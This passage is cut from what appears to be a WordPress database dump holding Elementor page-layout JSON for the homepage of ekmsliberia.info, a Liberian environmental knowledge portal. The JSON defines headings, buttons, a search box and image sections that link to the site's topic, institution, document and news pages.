Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest News & Blogs\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"339607e\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"684051a\",\"elType\":\"widget\",\"settings\":{\"number\":4,\"columns\":\"4\",\"equal_height_cols\":\"true\",\"title_trimmed\":\"yes\",\"title_length\":10,\"title_trimmed_ending_text\":\"...\",\"excerpt_length\":10,\"show_terms\":\"yes\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"537281f\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"821cf97\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_bg\":\"rgba(0,100,0,0.59)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"excerpt_color\":\"rgba(255,255,255,0.75)\",\"excerpt_typography_typography\":\"custom\",\"excerpt_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"terms_link_bg_color\":\"#6ec1e4\",\"carousel_enabled\":\"yes\",\"title_color_hover\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-posts\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read All News & Blogs\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/news-and-blogs\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2c527f4\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6472317\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"39c4f0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(19462,2851,'_elementor_version','2.7.5'),(19463,2851,'_elementor_template_type','wp-page'),(19464,2851,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(19467,2852,'_wp_page_template','default'),(19468,2852,'_elementor_edit_mode','builder'),(19469,2852,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\",\"background_slideshow_slide_transition\":\"slide_left\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.04)\",\"padding\":{\"unit\":\"px\",\"top\":\"130\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Roboto\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by 